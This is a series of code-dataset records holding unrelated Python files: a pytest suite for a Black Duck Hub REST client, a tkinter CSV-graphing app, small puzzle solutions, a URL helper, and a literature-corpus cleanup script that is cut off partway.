{"seq_id":"5063635669","text":"#!/usr/bin/env python\n\nimport copy\nimport json\nimport os\nimport pytest\nimport re\nfrom urllib.parse import urlparse\n\nfrom blackduck.HubRestApi import HubInstance\nfrom unittest.mock import patch, MagicMock, mock_open\n\n\nfake_hub_host = \"https://my-hub-host\"\n\n\ndef return_auth_token(api_token):\n    if api_token:\n        return (\"the-token\", \"the-csrf-token\")\n    else:\n        return (\"the-token\", None)\n\ninvalid_bearer_token=\"anInvalidTokenValue\"\ninvalid_csrf_token=\"anInvalidCSRFTokenValue\"\nmade_up_api_token=\"theMadeUpAPIToken\"\n\ndef setup_function(function):\n    # Remove .restconfig file before running any test\n    try:\n        os.remove(HubInstance.configfile)\n    except OSError:\n        pass\n\ndef teardown_function(function):\n    # Remove .restconfig file after running any test\n    try:\n        os.remove(HubInstance.configfile)\n    except OSError:\n        pass\n    \n@pytest.fixture()\ndef mock_hub_instance(requests_mock):\n    requests_mock.post(\n        \"{}/j_spring_security_check\".format(fake_hub_host), \n        headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n    )\n    requests_mock.get(\n        \"{}/api/current-version\".format(fake_hub_host),\n        json = {\n            \"version\": \"2018.11.0\",\n            \"_meta\": {\n                \"allow\": [\n                    \"GET\"\n                ],\n                \"href\": \"{}/api/current-version\".format(fake_hub_host)\n            }\n        }\n    )\n    yield HubInstance(fake_hub_host, \"a_username\", \"a_password\")\n\n@pytest.fixture()\ndef mock_hub_instance_using_api_token(requests_mock):\n    requests_mock.post(\n        \"https://my-hub-host/api/tokens/authenticate\", \n        content = json.dumps({'bearerToken': invalid_bearer_token}).encode('utf-8'),\n        headers={\n            'X-CSRF-TOKEN': invalid_csrf_token, \n            'Content-Type': 'application/json'\n        }\n    )\n    requests_mock.get(\n        \"{}/api/current-version\".format(fake_hub_host),\n        json = {\n            \"version\": \"2018.11.0\",\n            \"_meta\": {\n                \"allow\": [\n                    \"GET\"\n                ],\n                \"href\": \"{}/api/current-version\".format(fake_hub_host)\n            }\n        }\n    )\n\n    yield HubInstance(fake_hub_host, api_token=made_up_api_token)\n\n@pytest.fixture()\ndef policy_info_json(shared_datadir):\n    yield json.load((shared_datadir / \"policies.json\").open())\n\n@pytest.fixture()\ndef a_test_policy(policy_info_json):\n    test_policy = policy_info_json['items'][0]\n    yield test_policy\n\n@pytest.fixture()\ndef a_test_policy_for_create_or_update(a_test_policy):\n    # a_policy_for_creating_or_updating = dict(\n    #     (attr, test_policy[attr]) for attr in \n    #     ['name', 'description', 'enabled', 'overridable', 'expression', 'severity'] if attr in test_policy)\n    # yield a_policy_for_creating_or_updating\n    yield a_test_policy\n\n@pytest.fixture()\ndef test_vulnerability_info(requests_mock, shared_datadir):\n    yield json.loads((shared_datadir / \"sample-vulnerability.json\").read_text())\n\ndef test_get_major_version(requests_mock):\n    requests_mock.post(\n        \"{}/j_spring_security_check\".format(fake_hub_host), \n        headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n    )\n    for version in [\"2018.11.0\", \"5.0.2\", \"4.8.3\", \"3.7.2\"]:\n        expected = version.split(\".\")[0]\n        requests_mock.get(\n            \"{}/api/current-version\".format(fake_hub_host),\n            json = {\n                \"version\": \"{}\".format(version),\n                \"_meta\": {\n                    \"allow\": [\n                        \"GET\"\n                    ],\n                    \"href\": \"{}/api/current-version\".format(fake_hub_host)\n                }\n            }\n        )\n        hub = HubInstance(fake_hub_host, \"a_username\", \"a_password\")\n        assert hub.bd_major_version == expected\n\ndef test_get_headers(mock_hub_instance):\n    # somewhat contrived, but it does execute all the paths\n    # TODO: better way to test this one?\n    #\n    the_api_token = \"fake-api-token\"\n    the_csrf_token = \"fake-csrf-token\"\n    the_token = \"fake-bearer-token\"\n    mock_hub_instance.config['api_token'] = the_api_token\n    mock_hub_instance.csrf_token = the_csrf_token\n    mock_hub_instance.token = the_token\n\n    assert mock_hub_instance.get_headers() == {\n        'X-CSRF-TOKEN': the_csrf_token, \n        'Authorization': \"Bearer {}\".format(the_token),\n        'Content-Type': 'application/json',\n        'Accept': 'application/json'}\n\n    del mock_hub_instance.config['api_token']\n    for bd_major_version in [\"2018\", \"5\", \"4\", \"3\"]:\n        if bd_major_version == \"3\":\n            expected = {\"Cookie\": mock_hub_instance.cookie}\n        else:\n            expected = {\"Authorization\":\"Bearer \" + mock_hub_instance.token}\n\n        mock_hub_instance.bd_major_version = bd_major_version\n        assert mock_hub_instance.get_headers() == expected\n\ndef test_get_policy_url(mock_hub_instance):\n    assert mock_hub_instance._get_policy_url() == fake_hub_host + \"/api/policy-rules\"\n\ndef test_get_parameter_string(mock_hub_instance):\n    assert mock_hub_instance._get_parameter_string({\"limit\":\"100\"}) == \"?limit=100\"\n    assert mock_hub_instance._get_parameter_string({\"limit\":\"100\", \"q\":\"name:my-name\"}) == \"?limit=100&q=name%3Amy-name\"\n    assert mock_hub_instance._get_parameter_string({\"limit\":\"100\", \"sort\":\"updatedAt\"}) == \"?limit=100&sort=updatedAt\"\n\ndef test_hub_instance_username_password_for_auth(mock_hub_instance):\n    assert mock_hub_instance.get_headers() == {\"Authorization\":\"Bearer {}\".format(invalid_bearer_token)}\n\n    assert 'api_token' not in mock_hub_instance.config\n    assert 'baseurl' in mock_hub_instance.config\n    assert 'username' in mock_hub_instance.config\n    assert 'password' in mock_hub_instance.config\n\ndef test_hub_instance_api_token_for_auth(mock_hub_instance_using_api_token):\n    assert mock_hub_instance_using_api_token.get_headers() == {\n        'X-CSRF-TOKEN': invalid_csrf_token, \n        'Authorization': 'Bearer {}'.format(invalid_bearer_token), \n        'Content-Type': 'application/json',\n        'Accept': 'application/json'}\n\n    assert 'api_token' in mock_hub_instance_using_api_token.config\n    assert 'baseurl' in mock_hub_instance_using_api_token.config\n    assert 'username' not in mock_hub_instance_using_api_token.config\n    assert 'password' not in mock_hub_instance_using_api_token.config\n\ndef test_hub_instance_with_write_config(requests_mock):\n    requests_mock.post(\n        \"https://my-hub-host/j_spring_security_check\", \n        headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n    )\n    requests_mock.get(\n        \"{}/api/current-version\".format(fake_hub_host),\n        json = {\n            \"version\": \"2018.11.0\",\n            \"_meta\": {\n                \"allow\": [\n                    \"GET\"\n                ],\n                \"href\": \"{}/api/current-version\".format(fake_hub_host)\n            }\n        }\n    )\n    \n    with patch(\"builtins.open\", new_callable=mock_open()) as m:\n        with patch('json.dump') as m_json:\n            hub = HubInstance(fake_hub_host, \"a_username\", \"a_password\")\n\n    m.assert_called_with('.restconfig.json', 'w')\n    assert m_json.called\n\ndef test_hub_instance_with_write_config_false(requests_mock):\n    requests_mock.post(\n        \"https://my-hub-host/j_spring_security_check\", \n        headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n    )\n    requests_mock.get(\n        \"{}/api/current-version\".format(fake_hub_host),\n        json = {\n            \"version\": \"2018.11.0\",\n            \"_meta\": {\n                \"allow\": [\n                    \"GET\"\n                ],\n                \"href\": \"{}/api/current-version\".format(fake_hub_host)\n            }\n        }\n    )\n\n    with patch.object(HubInstance, \"write_config\") as mock_write_config:\n        hub = HubInstance(fake_hub_host, \"a_username\", \"a_password\", write_config_flag=False)\n\n    assert not mock_write_config.called\n\ndef test_get_policy_by_id(requests_mock, mock_hub_instance, a_test_policy):\n    requests_mock.get(fake_hub_host + \"/api/policy-rules/00000000-0000-0000-0000-000000000001\", json=a_test_policy)\n    policy = mock_hub_instance.get_policy_by_id(\"00000000-0000-0000-0000-000000000001\")\n    for key in a_test_policy.keys():\n        assert policy[key] == a_test_policy[key]\n\ndef test_get_policy_by_url(requests_mock, mock_hub_instance, a_test_policy):\n    requests_mock.get(fake_hub_host + \"/api/policy-rules/00000000-0000-0000-0000-000000000001\", json=a_test_policy)\n    policy = mock_hub_instance.get_policy_by_url(mock_hub_instance._get_policy_url() + \"/00000000-0000-0000-0000-000000000001\")\n    for key in a_test_policy.keys():\n        assert policy[key] == a_test_policy[key]\n\ndef test_update_policy_by_id(requests_mock, mock_hub_instance, a_test_policy, a_test_policy_for_create_or_update):\n    policy_id = a_test_policy['_meta']['href'].split(\"/\")[-1]\n\n    requests_mock.put(fake_hub_host + \"/api/policy-rules/\" + policy_id,\n        json=a_test_policy\n    )\n    response = mock_hub_instance.update_policy_by_id(policy_id, a_test_policy_for_create_or_update)\n    assert response.status_code == 200\n    assert response.json() == a_test_policy\n\ndef test_update_policy_by_url(requests_mock, mock_hub_instance, a_test_policy, a_test_policy_for_create_or_update):\n    policy_id = a_test_policy['_meta']['href'].split(\"/\")[-1]\n    policy_url = mock_hub_instance._get_policy_url() + \"/\" + policy_id\n\n    requests_mock.put(fake_hub_host + \"/api/policy-rules/\" + policy_id,\n        json=a_test_policy\n    )\n    response = mock_hub_instance.update_policy_by_url(policy_url, a_test_policy_for_create_or_update)\n    assert response.status_code == 200\n    assert response.json() == a_test_policy\n\ndef test_create_policy(requests_mock, mock_hub_instance, a_test_policy, a_test_policy_for_create_or_update):\n    requests_mock.post(fake_hub_host + \"/api/policy-rules\", headers={\"location\": a_test_policy['_meta']['href']}, status_code=201)\n    # print(json.dumps(a_test_policy_for_create_or_update))\n    new_policy_url = mock_hub_instance.create_policy(a_test_policy_for_create_or_update)\n    assert new_policy_url == a_test_policy['_meta']['href']\n\ndef test_delete_policy_by_id(requests_mock, mock_hub_instance, a_test_policy):\n    policy_id = a_test_policy['_meta']['href'].split(\"/\")[-1]\n\n    requests_mock.delete(fake_hub_host + \"/api/policy-rules/\" + a_test_policy['_meta']['href'].split(\"/\")[-1], status_code=204)\n    response = mock_hub_instance.delete_policy_by_id(policy_id)\n    assert response.status_code == 204\n\ndef test_delete_policy_by_url(requests_mock, mock_hub_instance, a_test_policy):\n    policy_url = mock_hub_instance._get_policy_url() + \"/\" + a_test_policy['_meta']['href'].split(\"/\")[-1]\n\n    requests_mock.delete(policy_url, status_code=204)\n    response = mock_hub_instance.delete_policy_by_url(policy_url)\n    assert response.status_code == 204\n\ndef test_get_vulnerability(requests_mock, mock_hub_instance, test_vulnerability_info):\n    vulnerability_url = mock_hub_instance._get_vulnerabilities_url() + \"/{}\".format(test_vulnerability_info['vulnerabilityName'])\n\n    requests_mock.get(vulnerability_url, json=test_vulnerability_info)\n    response_json = mock_hub_instance.get_vulnerabilities(test_vulnerability_info['vulnerabilityName'])\n\n    assert response_json == test_vulnerability_info\n\ndef test_get_projects_with_limit(requests_mock, mock_hub_instance, shared_datadir):\n    url = mock_hub_instance.get_urlbase() + \"/api/projects?limit=20\"\n    json_data = json.load((shared_datadir / 'sample-projects.json').open())\n    requests_mock.get(url, json=json_data)\n    projects = mock_hub_instance.get_projects(limit=20)\n\n    assert json_data == projects\n    assert 'totalCount' in projects\n    assert projects['totalCount'] == 18\n\ndef test_get_projects_with_name_query(requests_mock, mock_hub_instance, shared_datadir):\n    url = mock_hub_instance.get_urlbase() + \"/api/projects?q=name:accelerator-initializer-ui&limit=100\"\n    json_data = json.load((shared_datadir / 'sample-projects-using-name-query.json').open())\n    requests_mock.get(url, json=json_data)\n    projects = mock_hub_instance.get_projects(parameters={'q':\"name:accelerator-initializer-ui\"})\n\n    assert json_data == projects\n    assert 'totalCount' in projects\n    assert projects['totalCount'] == 1\n\ndef test_get_project_versions(requests_mock, mock_hub_instance, shared_datadir):\n    baseurl = mock_hub_instance.get_urlbase()\n    url = baseurl + \"/api/projects/65f272df-3a2a-4022-8811-a57e05e82f52/versions?limit=100\"\n    json_data = json.load((shared_datadir / 'sample-project-versions.json').open())\n    project_json_data = json.load((shared_datadir / 'sample-project.json').open())\n    # replace project URL with the right one to agree with our mocked URL above\n    project_json_data['_meta']['href'] = re.sub(\"https://.*/api\", \"{}/api\".format(baseurl), project_json_data['_meta']['href'])\n    requests_mock.get(url, json=json_data)\n    versions = mock_hub_instance.get_project_versions(project_json_data)\n\n    assert 'totalCount' in versions\n    assert versions['totalCount'] == 1\n\ndef test_get_project_versions_with_parameters(requests_mock, mock_hub_instance, shared_datadir):\n    baseurl = mock_hub_instance.get_urlbase()\n    url = baseurl + \"/api/projects/65f272df-3a2a-4022-8811-a57e05e82f52/versions?limit=100&q=versionName:1.0\"\n    json_data = json.load((shared_datadir / 'sample-project-versions.json').open())\n    project_json_data = json.load((shared_datadir / 'sample-project.json').open())\n    # replace project URL with the right one to agree with our mocked URL above\n    project_json_data['_meta']['href'] = re.sub(\"https://.*/api\", \"{}/api\".format(baseurl), project_json_data['_meta']['href'])\n    requests_mock.get(url, json=json_data)\n    versions = mock_hub_instance.get_project_versions(project_json_data, parameters={'q':'versionName:1.0'})\n\n    assert 'totalCount' in versions\n    assert versions['totalCount'] == 1\n    assert 'items' in versions\n\ndef test_delete_project_version_by_name():\n    # TODO: Write this test\n    pass\n\n\ndef test_get_users(requests_mock, mock_hub_instance, shared_datadir):\n    baseurl = mock_hub_instance.get_urlbase()\n    url = baseurl + \"/api/users\"\n    user_json_data = json.load((shared_datadir / \"users.json\").open())\n    requests_mock.get(url, json=user_json_data)\n    users = mock_hub_instance.get_users()\n\n    assert 'totalCount' in users\n    assert users['totalCount'] == 1 # cause there was one user in the sample data collected\n    assert 'items' in users\n\ndef test_create_user(requests_mock, mock_hub_instance):\n    pass\n\ndef test_get_user_by_id(requests_mock, mock_hub_instance):\n    pass\n\ndef test_get_user_by_url(requests_mock, mock_hub_instance):\n    pass\n\ndef test_update_user_by_id(requests_mock, mock_hub_instance):\n    pass\n\ndef test_update_user_by_url(requests_mock, mock_hub_instance):\n    pass\n\ndef test_delete_user_by_id(requests_mock, mock_hub_instance):\n    pass\n\ndef test_delete_user_by_url(requests_mock, mock_hub_instance):\n    pass\n    \ndef test_get_project_by_name(requests_mock, mock_hub_instance, shared_datadir):\n    url = mock_hub_instance.get_urlbase() + \"/api/projects\"\n    projects_json = json.load((shared_datadir / \"sample-projects.json\").open())\n    project_name = \"accelerator-initializer-ui\"\n    requests_mock.get(url, json=projects_json)\n\n    project = mock_hub_instance.get_project_by_name(project_name)\n\n    assert project['name'] == project_name\n\ndef test_get_version_by_name(requests_mock, mock_hub_instance, shared_datadir):\n    mock_hub_instance.get_project_versions = MagicMock(return_value=json.load((shared_datadir / \"sample-project-versions.json\").open()))\n\n    mock_project_obj = MagicMock()\n    version_name = \"1.0\" # a version that exists in sample-project-versions.json\n    version = mock_hub_instance.get_version_by_name(mock_project_obj, version_name)\n\n    assert version['versionName'] == version_name\n\ndef test_create_version_reports(requests_mock, mock_hub_instance):\n    pass\n\ndef test_create_version_notices_report(requests_mock, mock_hub_instance):\n    pass\n\n@pytest.fixture()\ndef sample_bom_component_json(shared_datadir):\n    yield json.load((shared_datadir / \"sample-bom-component.json\").open())\n\n@pytest.fixture()\ndef no_roles_user(shared_datadir):\n    yield json.load((shared_datadir / 'no-roles-user.json').open())\n\n@pytest.fixture()\ndef no_roles_roles(shared_datadir):\n    yield json.load((shared_datadir / 'no-roles-roles.json').open())\n\n@pytest.fixture()\ndef sysadmin_user(shared_datadir):\n    yield json.load((shared_datadir / 'sysadmin-user.json').open())\n\n@pytest.fixture()\ndef sysadmin_roles(shared_datadir):\n    yield json.load((shared_datadir / 'sysadmin-roles.json').open())\n\ndef test_user_has_role(no_roles_user, no_roles_roles, sysadmin_user, sysadmin_roles, mock_hub_instance):\n    test_roles = [\n        'License Manager', \n        'System Administrator', \n        'Policy Manager', \n        'Project Viewer', \n        'Global Code Scanner', \n        'Project Manager']\n    \n    mock_hub_instance.get_roles_for_user_or_group = MagicMock()\n    mock_hub_instance.get_roles_for_user_or_group.return_value = no_roles_roles\n\n    for test_role in test_roles:\n        assert mock_hub_instance.user_has_role(no_roles_user, test_role) == False\n\n    mock_hub_instance.get_roles_for_user_or_group.return_value = sysadmin_roles\n\n    for test_role in test_roles:\n        assert mock_hub_instance.user_has_role(sysadmin_user, test_role) == True\n\ndef test_get_link(mock_hub_instance):\n    a_url = 'http://a-url'\n    link_name = 'a_link_name'\n    bd_rest_obj = {'_meta':{'links': [{'rel': link_name, 'href': a_url}]}}\n\n    assert mock_hub_instance.get_link(bd_rest_obj, link_name) == a_url\n\ndef test_get_link_returns_None_for_invalid_bd_rest_object(mock_hub_instance):\n    bd_rest_obj = {}\n\n    assert mock_hub_instance.get_link(bd_rest_obj, 'a_link_name') == None\n\ndef test_validated_json_with_a_dictionary(mock_hub_instance):\n    validated_json = mock_hub_instance._validated_json_data({'key':'value'})\n    assert isinstance(validated_json, str)\n    assert validated_json == '{\"key\": \"value\"}'\n\ndef test_validated_json_with_a_list(mock_hub_instance):\n    validated_json = mock_hub_instance._validated_json_data(['item1', 'item2'])\n    assert isinstance(validated_json, str)\n    assert validated_json == '[\"item1\", \"item2\"]'\n\ndef test_validated_json_with_a_json_str(mock_hub_instance):\n    validated_json = mock_hub_instance._validated_json_data('{\"key\": \"value\"}')\n\n    assert validated_json == '{\"key\": \"value\"}'\n\ndef test_validated_json_fails_with_invalid_json_str(mock_hub_instance):\n    from json import JSONDecodeError\n\n    with pytest.raises(JSONDecodeError) as e_info:\n        validated_json = mock_hub_instance._validated_json_data('invalid json')\n\n@pytest.fixture()\ndef code_locations(requests_mock, shared_datadir):\n    data = json.load((shared_datadir / 'code_locations.json').open())\n    requests_mock.get(\n        \"{}/api/codelocations?limit=100\".format(fake_hub_host),\n        json = data\n    )\n    yield data\n\ndef test_get_codelocations_all(mock_hub_instance, code_locations):\n    code_locs = mock_hub_instance.get_codelocations()\n\n    assert code_locs == code_locations\n\ndef test_get_codelocations_unmapped(mock_hub_instance, code_locations):\n    code_locs = mock_hub_instance.get_codelocations(unmapped=True)\n\n    assert code_locs != code_locations\n\n    expected_data = copy.deepcopy(code_locations)\n    expected_data['items'] = [cl for cl in code_locations['items'] if 'mappedProjectVersion' not in cl]\n    expected_data['totalCount'] = len(expected_data['items'])\n\n    assert code_locs == expected_data\n\n\n","repo_name":"blackducksoftware/hub-rest-api-python","sub_path":"test/test_hub_rest_api_python.py","file_name":"test_hub_rest_api_python.py","file_ext":"py","file_size_in_byte":19966,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"51"}
{"seq_id":"15518904525","text":"from tkinter import *\nfrom tkinter import filedialog\nfrom tkinter.ttk import Combobox\nimport pandas as pd\n\nroot = Tk()\nroot.title(\"CSE 350 Project\")\nroot.geometry(\"1325x700\")\nroot.resizable(False, False)\n\nlengthOfHeaders = 0; valueOfCheckList = []; valueOfComboList = []; buttonsAndChecksList = []; df = pd.DataFrame\n\ndef getCSVFile() -> None:\n    global df\n    root.filename = filedialog.askopenfilename(title=\"Select A CSV File\", filetypes=[(\"CSV Files\", \"*.csv\")])\n    df = pd.read_csv(root.filename)\n    getCSVHeaders(df)\n    gg = Button(root, text = \"Get Graphs & Data\")\n    gg.grid(column=0, row=(6+lengthOfHeaders), columnspan=2)\n    buttonsAndChecksList.append(gg)\n\ndef getCSVHeaders(df: pd.DataFrame) -> None:\n    global lengthOfHeaders, valueOfCheckList, buttonsAndChecksList, valueOfComboList\n    valueOfCheckList.clear()\n    valueOfComboList.clear()\n    lengthOfHeaders = 0\n    for chcb in buttonsAndChecksList:\n        chcb.destroy()\n    for h in df.head(0):\n        lengthOfHeaders += 1\n        valueOfCheckList.append(IntVar())\n        valueOfComboList.append(StringVar())\n    c = 0\n    for h in df.head(0):\n        ch = Checkbutton(root, text=h, variable=valueOfCheckList[c], onvalue=1, offvalue=0, width=20)\n        ch.grid(column=0, row=(6+c))\n        buttonsAndChecksList.append(ch)\n        cb = Combobox(root, text=\"Select Graph Format\", values=['Line', 'Scatter', 'Histogram', 'Bar'], textvariable=valueOfComboList[c])\n        cb.current(0)\n        cb.grid(column=1, row=(6+c))\n        buttonsAndChecksList.append(cb)\n        c += 1\n    \ntitleLabel = Label(root, text=\"CSE 350 Data Visualization Project\").grid(column=0, row=0, columnspan=2)\nfilebutton = Button(root, text = \"Upload CSV File\", command = getCSVFile).grid(column=0, row=1, columnspan=2)\nheaderLabel = Label(root, text=\"Select Headers to Graph\").grid(column=0, row=5)\npickGraphForHeaderLabel = Label(root, text=\"Select Graph Format\").grid(column=1, row=5)\n\nroot.mainloop()","repo_name":"dchequer/Term-Project","sub_path":"src/startCodeProj.py","file_name":"startCodeProj.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"18791698285","text":"#!/user/bin/python3\n\n\"\"\" This solves the problems of cows\"\"\"\n\nfor i in range(21):\n    for j in range(34):\n        for k in range(100):\n            if i + j + k == 100:\n                if 5*i + 3*j + k/5 == 100:\n                    print(i,j,k)\n","repo_name":"tonyle90/python-tutorial","sub_path":"number_of_cows.py","file_name":"number_of_cows.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"45824519841","text":"def split_point(r, c):\n    global board\n    for i in range(4):\n        x = (r + dx[i]) % n\n        y = (c + dy[i]) % n\n        if board[x][y] == 0:\n            board[x][y] = board[r][c] // 4\n\n\nn = int(input())\nk = int(input())\nboard = [list(map(int, input().split())) for _ in range(n)]\nans = 0\nturn = 0\n\nattack = list(map(int, input().split()))\nselect = -1\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\nwhile True:\n    if turn == k:\n        break\n    max_bonus = 0\n    for i in range(n):\n        if board[i][turn] > max_bonus:\n            max_bonus = board[i][turn]\n            select = i\n    if max_bonus >= 10:\n        ans += max_bonus\n        split_point(select, turn)\n    else:\n        if board[select][turn] > attack[turn]:\n            board[select][turn] -= attack[turn]\n        else:\n            ans += board[select][turn]\n            board[select][turn] = 0\n\nprint(ans)","repo_name":"twoju/Algorithm","sub_path":"Baekjoon/Gold/27958_shoot.py","file_name":"27958_shoot.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"15128184671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time: 2023/01/29\n# @Author: Neil Steven\n\nfrom urllib.parse import urlparse, urlunparse\n\nfrom ns_path import join_path\n\n__all__ = [\n    \"join_url\"\n]\n\n\ndef join_url(base: str, path: str, *sub_path: str) -> str:\n    arr = urlparse(base)\n    path = join_path(arr.path, path, *sub_path)\n    return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment))\n","repo_name":"Neil-Steven/nspy","sub_path":"ns_url.py","file_name":"ns_url.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"38248871906","text":"import re\nimport os\nimport sys\nimport time\nimport logging\nimport logging.handlers\nfrom datetime import datetime\nimport mysql.connector\nfrom csv import reader\nimport filecmp\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import Select\nfrom bs4 import BeautifulSoup\nfrom SPARQLWrapper import SPARQLWrapper, JSON\n\n# Get the directory to search from the user\nbase_dir: str = input(\"Enter the base directory of the literature files: \")\nprint_to_terminal: str = input(\"Output prints to terminal? (y/n)\")\n\n# Remove trailing '/' if it was given\nif base_dir[-1] == '/':\n\tbase_dir = base_dir[:-1]\n\nos.makedirs('logs/', exist_ok=True)\n\n# Custom logger\nlogger: logging.RootLogger = logging.getLogger(\"reduce_corpora\")\nlogger.setLevel(logging.DEBUG)\n\n# File name for log files\nlogfilename: str = 'logs/match_log{:%Y-%m-%d}.log'.format(datetime.now())\n\n# Flag to determine if the logger has already created a file\nrollover: bool = os.path.isfile(logfilename)\n\n# Handler for log files\n# The FileHandler will also output logs to the terminal window, so an extra\n# \thandler for that is not necessary\nfile_handler: logging.handlers.RotatingFileHandler = logging.handlers.RotatingFileHandler(logfilename, mode='w', backupCount=5, delay=True)\n\n# Handler for terminal log entries\nprint_handler: logging.StreamHandler = logging.StreamHandler()\n\nif 'y' in print_to_terminal.lower():\n\tprint_handler.setLevel(logging.DEBUG)\nelse:\n\tprint_handler.setLevel(logging.INFO)\n\n# Roll over file name if a log already exists\nif rollover:\n\tfile_handler.doRollover()\n\nfile_handler.setLevel(logging.DEBUG)\n\n# Formatter for logger output\nlog_format: logging.Formatter = logging.Formatter('%(asctime)s\\t: %(name)s : %(levelname)s -- %(message)s', '%Y-%m-%d %H:%M:%S')\nfile_handler.setFormatter(log_format)\nprint_handler.setFormatter(log_format)\n\n# Add to logger\nlogger.addHandler(file_handler)\nlogger.addHandler(print_handler)\n\n# Connect to SQL database\ndb_conn: mysql.connector.MySQLConnection = mysql.connector.connect(\n\tuser=os.environ.get('DB_USER'),\n\tpassword=os.environ.get('DB_PASS'),\n\thost=os.environ.get('DB_IP'),\n\tdatabase=os.environ.get('DB_DB'))\n\ndb_cursor: mysql.connector.cursor.CursorBase = db_conn.cursor()\n\n# This will go through the gut_texts and lib_texts directories and\n#\tremove all files/database entries that are seen as not published\n#\twithin the range we care about.\n# This uses a regular expression to find \"dates\" within the files, so it is\n#\tnot very accurate. This was not used in the final reduction of the\n#\tcorpora, but I figured the code should stay in case it is useful\n#\tin the future.\ndef remove_texts_out_of_range() -> None:\n\tre_date: object = re.compile(r'\\b1([0-9][0-9][0-9])\\b')\n\tin_range_count: int = 0\n\tmatch_count: int = 0\n\tdirs: list = ['gut_texts', 'lib_texts']\n\n\tfor pdir in dirs:\n\t\tlogger.info(f'Checking texts in {base_dir}/{pdir}...')\n\n\t\t# Walk the directory of files\n\t\tfor path, _, files in os.walk(os.path.abspath(f'{base_dir}/{pdir}')):\n\t\t\t# Process each file in the directory\n\t\t\tfor f in files:\n\t\t\t\tfilepath: str = os.path.join(path, f)\n\n\t\t\t\twith open(filepath, mode='r', encoding='utf8') as file:\n\t\t\t\t\t# Read the file line by line, checking for a string match.\n\t\t\t\t\t#\tIf a match is found, print the line it was found on\n\t\t\t\t\t#\tand the file path\n\t\t\t\t\tlargest_match: int = 0\n\t\t\t\t\tfor index, line in enumerate(file):\n\t\t\t\t\t\tmatch: object = re_date.search(line)\n\n\t\t\t\t\t\t# Found a match -> print the line & file then end loop\n\t\t\t\t\t\t# In a lot of the gutenberg files, the first match is some address in\n\t\t\t\t\t\t#\tSalt Lake City so it is best to skip over that one\n\t\t\t\t\t\tif match and 'salt lake city' not in line.lower():\n\t\t\t\t\t\t\tmatch_count = match_count + 1\n\t\t\t\t\t\t\tdate: int = int(match[0])\n\n\t\t\t\t\t\t\t# Keep the ones that are in range, but remove the file and database entry\n\t\t\t\t\t\t\t#\tfor the ones that are not\n\t\t\t\t\t\t\tif date > 1755:\n\t\t\t\t\t\t\t\tlogger.debug(f'OUT OF RANGE match {match[0]} found in {filepath} on line {index}:\\n\\t{line}')\n\t\t\t\t\t\t\t\t# Find the entry in the database containing this file and delete both\n\t\t\t\t\t\t\t\t#\tthe entry and the file\n\n\t\t\t\t\t\t\t\t## This code was left commented so nothing gets\n\t\t\t\t\t\t\t\t## accidentally deleted.\n\n\t\t\t\t\t\t\t\t# try:\n\t\t\t\t\t\t\t\t# \tdb_cursor.execute(f'SELECT id FROM work_metadata WHERE filepath LIKE \"{pdir}/{f}\"')\n\t\t\t\t\t\t\t\t# except Exception as err:\n\t\t\t\t\t\t\t\t# \tprint(f'{pdir}/{f}')\n\t\t\t\t\t\t\t\t# \tlogger.error(f'Problem finding file in database:', exc_info=True)\n\t\t\t\t\t\t\t\t# else:\n\t\t\t\t\t\t\t\t# \tresults: list = db_cursor.fetchall()\n\t\t\t\t\t\t\t\t# \t#print(results)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlogger.debug(f'In-range match {match[0]} found in {filepath} on line {index}:\\n\\t{line}')\n\t\t\t\t\t\t\t\tin_range_count = in_range_count + 1\n\n\t\t\t\t\t\t\tbreak\n\n\t\tlogger.info(f'Found {in_range_count} files in {pdir} containing a match within the desired range.')\n\t\tlogger.info(f'{match_count} contained a match in general.')\n\n\t\tin_range_count = 0\n\t\tmatch_count = 0\n\n\tlogger.info(f'Matches can be found in {logfilename}')\n\ndef remove_unknown_titleauthor() -> None:\n\tdb_cursor.execute('SELECT id, filepath FROM work_metadata WHERE title LIKE \"UNKNOWN%\" AND author LIKE \"UNKNOWN%\";')\n\tresults: list = db_cursor.fetchall()\n\n\tlogger.info(f'Removing {len(results)} files and database entries with UNKNOWN title & author...')\n\t\n\tfor index, elem in enumerate(results):\n\t\ttry:\n\t\t\tos.remove(f'{base_dir}/{elem[1]}')\n\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {elem[0]}')\n\t\t\tdb_conn.commit()\n\t\texcept Exception as err:\n\t\t\tlogger.critical(f'Problem removing file or database entry for {elem[1]}: ', exc_info=True)\n\n\tlogger.info('Done.')\n\ndef remove_duplicates() -> None:\n\t# The entries that have duplicates have been stored in a csv file,\n\t#\tso we can just read the title and author combos and work with\n\t#\tthem directory instead of searching again\n\n\tequivalent: int = 0\n\n\twith open('query.csv', 'r') as csv_file:\n\t\tcsv_reader: reader = reader(csv_file, delimiter='\\t')\n\n\t\t# Skip over the header\n\t\theader: str = next(csv_reader)\n\n\t\t# Iterate over the file if it's not empty\n\t\tif 